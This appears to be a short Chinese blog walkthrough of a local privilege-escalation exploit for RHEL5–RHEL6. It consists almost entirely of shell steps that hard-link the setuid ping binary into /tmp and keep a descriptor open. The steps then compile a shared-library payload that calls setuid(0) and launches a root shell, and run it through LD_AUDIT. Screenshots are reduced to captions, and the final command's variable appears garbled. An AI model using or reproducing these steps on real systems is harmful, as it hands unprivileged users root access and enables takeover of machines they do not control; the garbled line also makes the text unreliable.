说明:RHEL5—RHEL6下  都可以提权


1. ls -ld /tmp/

 普通用户提权_提权


2. ls -l /bin/ping

 普通用户提权_安全技术_02


3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target

 普通用户提权_提权_03


4. exec 3< /tmp/exploit/target ;  rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3


 普通用户提权_提权_04


 普通用户提权_安全技术_05 


5. vim payload.c

   void __attribute__((constructor)) init()

   {

    setuid(0);

    system("/bin/bash");

   }


 普通用户提权_提权_06

 

6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit

 普通用户提权_安全技术_07



7. LD_AUDIT="\0RIGIN" exec /proc/self/fd/3

 普通用户提权_安全技术_08